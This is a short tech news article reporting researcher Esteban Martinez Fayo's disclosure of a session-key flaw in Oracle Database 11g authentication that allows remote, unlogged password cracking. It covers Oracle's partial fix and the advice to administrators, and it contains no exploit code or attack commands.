Flaw Exposes Oracle Database Passwords

A vulnerability in Oracle Database 11g Releases 1 and 2 could allow an attacker to remotely steal information located on the database, including user passwords.

The flaw, which was reported by firm Kaspersky Lab Security and discovered by researcher Esteban Martinez Fayo, occurs due to an issue in how the authentication protocol protects session keys when users try to log in. According to Fayo, he was able to crack the database password and gain access to private information within five hours using a specially designed tool.

"This Session Key is a random value that the server generates and sends as the initial step in the authentication process, before the authentication has been completed," said Fayo. "This is the reason why this attack can be done remotely without the need of authentication and also, as the attacker can close the connection once the Session Key has been sent, there is no failed login attempt recorded in the server because the authentication is never completed."

Fayo discovered the issue after noticing that there was a difference in how the clients and databases handled incorrect passwords during log-in attempts. He said that the databases did not record all incorrectly used passwords, and looking into why this was, discovered that the Session Key was leaking password hash information.

While Fayo is just now publically disclosing the flaw, he said that he told Oracle about the issue in May 2010. However, Oracle has only secured version 12 of the authentication protocol, leaving all older versions of the database vulnerable.

Due to the high-risk nature of the vulnerability, it is recommended that administrators update their configurations to allow only new versions of the protocol.

"The Oracle stealth password cracking vulnerability is a critical one.  There are many components to affirm this: It is easy to exploit, it doesn't leave any trace in the database server and it resides in an essential component of the logon protocol," said Fayo.

Oracle has not sent word commenting on the database flaw, nor has any plans to update older versions of the protocol.

About the Author

Chris Paoli (@ChrisPaoli5) is the associate editor for Converge360.